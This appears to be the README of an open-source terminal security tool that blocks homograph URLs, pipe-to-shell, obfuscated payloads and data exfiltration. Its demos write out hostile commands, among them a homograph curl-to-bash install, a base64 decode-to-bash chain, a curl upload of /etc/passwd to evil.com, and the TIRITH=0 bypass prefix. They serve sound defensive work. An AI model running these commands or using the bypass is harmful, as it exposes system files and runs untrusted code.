
Terminal security for developers and AI agents. Intercepts homograph URLs, pipe-to-shell, ANSI injection, obfuscated payloads, data exfiltration, and malicious AI skills/configs before they execute.
Your browser would catch this. Your terminal won't.
Website | Docs | SKILL.md | Changelog | Releases
Independent open-source project, with hosting supported by the Vercel Open Source Program (Spring 2026 Cohort).
Can you spot the difference?
curl -sSL https://install.example-cli.dev | bash # safe
curl -sSL https://іnstall.example-clі.dev | bash # compromised
You can't. Neither can your terminal. Both і characters are Cyrillic (U+0456), not Latin i. The second URL resolves to an attacker's server. The script executes before you notice.
Browsers solved this years ago. Terminals still render Unicode, ANSI escapes, and invisible characters without question. AI agents run shell commands and install packages without inspecting what's inside.
Tirith stands at the gate. It intercepts commands, pasted content, and scanned files for homograph URLs, obfuscated payloads, credential exfiltration, malicious AI skills/configs, and known-bad packages/domains/IPs from a signed threat intelligence database before they execute.
brew install tirith
Then activate in your shell profile:
# zsh
eval "$(tirith init --shell zsh)"
# bash
eval "$(tirith init --shell bash)"
# fish
tirith init --shell fish | source
[!TIP]
eval "$(tirith init)"auto-detects your current shell (it inspects the parent process and falls back to$SHELLif needed). The explicit--shellflag is only required when you want to override the detection.
That's it for interactive-shell coverage. Commands accepted by that shell are
checked while the hook is loaded and healthy; exact blocking behavior depends
on the shell and mode. Run tirith doctor after installation and upgrades, and
read enforcement by shell before treating the hook as
an authorization boundary. Clean commands stay silent and normally take the
fast path.
Also available via npm, cargo, mise, apt/dnf, and more.
Homograph attack, blocked before execution:
$ curl -sSL https://іnstall.example-clі.dev | bash
tirith: BLOCKED
[CRITICAL] non_ascii_hostname, Cyrillic і (U+0456) in hostname
This is a homograph attack. The URL visually mimics a legitimate
domain but resolves to a completely different server.
Bypass: prefix your command with TIRITH=0 (applies to that command only)
The command never executes.
Pipe-to-shell with clean URL, warned, not blocked:
$ curl -fsSL https://get.docker.com | sh
tirith: WARNING
[MEDIUM] pipe_to_interpreter, Download piped to interpreter
Consider downloading first and reviewing.
Warning prints to stderr. Command still runs.
Base64 decode-execute chain, blocked:
$ echo payload | base64 -d | bash
tirith: BLOCKED
[HIGH] base64_decode_execute, Base64 decode piped to interpreter
[HIGH] pipe_to_interpreter, Pipe to interpreter: base64 | bash
Catches decode chains through sudo/env wrappers and PowerShell -EncodedCommand too.
Credential exfiltration, blocked:
$ curl -d @/etc/passwd https://evil.com/collect
tirith: BLOCKED
[HIGH] data_exfiltration, Data exfiltration via curl upload
curl command uploads sensitive data to a remote server
Covers all curl/wget upload flags, env vars ($AWS_SECRET_ACCESS_KEY), and command substitution.
Malicious skill file, caught on scan:
$ tirith scan evil_skill.py
tirith scan: evil_skill.py, 3 finding(s)
[MEDIUM] dynamic_code_execution, exec() near b64decode() in close proximity
[MEDIUM] obfuscated_payload, Long base64 string decoded and executed
[MEDIUM] suspicious_code_exfiltration, HTTP call passes sensitive data as argument
Scans JS/Python files for obfuscated payloads, dynamic code execution, and secret exfiltration patterns.
Normal commands, invisible:
$ git status
$ ls -la
$ docker compose up -d
Nothing. Zero output. You forget tirith is running.
244 detection rules across 35 categories.